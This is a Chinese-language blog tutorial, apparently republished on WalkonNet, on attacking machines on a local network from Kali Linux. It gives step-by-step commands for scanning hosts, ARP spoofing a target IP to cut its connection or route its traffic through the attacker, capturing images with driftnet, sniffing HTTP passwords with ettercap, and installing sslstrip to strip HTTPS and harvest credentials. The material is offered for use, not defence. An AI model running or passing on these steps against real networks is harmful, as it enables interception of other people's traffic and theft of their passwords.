一篇文章帶你瞭解kali局域網攻擊
前言
很久以前的博客才發現,發佈一下。
這個系列以後有時間再做。
arp攻擊
arp路由鏈表,感興趣的自行百度,我的博客我的筆記.
路由指向
介紹兩個東西.
echo 0 >/proc/sys/net/ipv4/ip_forward #讓經過的數據不留通 echo 1 >/proc/sys/net/ipv4/ip_forward #讓數據流通
內網掃描
這個在百度上你可以看到很多相關的方式,比如nmap fping
但是基本上掃描結果不太號,在虛擬機上你會發現你把主機的防火墻關瞭都掃不到主機.
這裡使用netdiscover
當然這裡也寫幾個nmap之類的指令
nmap -PR -sL ip fping -asg ip netdiscover -i kali網卡 -r ip(網段) netdiscover -i eth0 -r 192.168.43.1/30
掃描速度是比較慢的
斷網攻擊
arpspoof -i kali的網卡 -t 目標地址 目標網卡 arpspoof -i eth0 -t 192.168.43.7 192.168.43.1
arp欺騙信息獲取
1.arpspoof -i eth0 -t 192.168.43.7 192.168.43.1
開始欺騙讓數據經過你的電腦
2.echo 1 >/proc/sys/net/ipv4/ip_forward
放掉數據包
獲取圖片
使用工具difinet
difinet –i eth0(網卡)
實際操作:
圖片會在那裡臨時保存
由於網絡問題可能會有點卡
獲取HTTP連接的密碼信息
使用ettercap
其他的操作還是一樣的,要開啟arp欺騙
ettercap –Tq –i eth0
–T 文本模式 q 安靜模式 i 網卡
然後等待即可.不過現在都是https,作用不大
出現中文怎麼辦,直接賦值中文亂碼,之後解碼即可
百度搜索url解碼
或者直接使用python
中文編碼 from urllib.parse import quote,unquote str1 = '中國' str2=quote(strl) print(str2) 解碼 print(unquote(str2))
獲取HTTPS的密碼信息
這個要先修改以下ettercap的配置文件.
vim /etc/ettercap/etter.conf
使用工具 sslstrip
那個吐槽一下 kali 2020是沒有sslstrip的原因是沒有安裝python2的pip 隻有pip3
記住一定要先安裝python2
在kali裡面python 默認為python2 當然你可以用ln -s 修改一下.
apt install python 這個時候會自動安裝python 2.7
然後輸入以下指令安裝sslstrip
git clone https://github.com/moxie0/sslstrip.git cd sslstrip python setup.py install
這個是python2的,如果沒猜錯可能會遇到OpenSSL報錯說沒有這個模塊
pip install pyOpenSSL
總結
本篇文章就到這裡瞭,希望能給你帶來幫助,也希望您能夠多多關註WalkonNet的更多內容!
推薦閱讀:
- Centos安裝python3與scapy模塊的問題及解決方法
- PyHacker編寫指南引用Nmap模塊實現端口掃描器
- linux查看服務器開放的端口和啟用的端口多種方式
- 已解決卸載pip重新安裝的方法
- 國產化設備鯤鵬CentOS7上源碼安裝Python3.7的過程詳解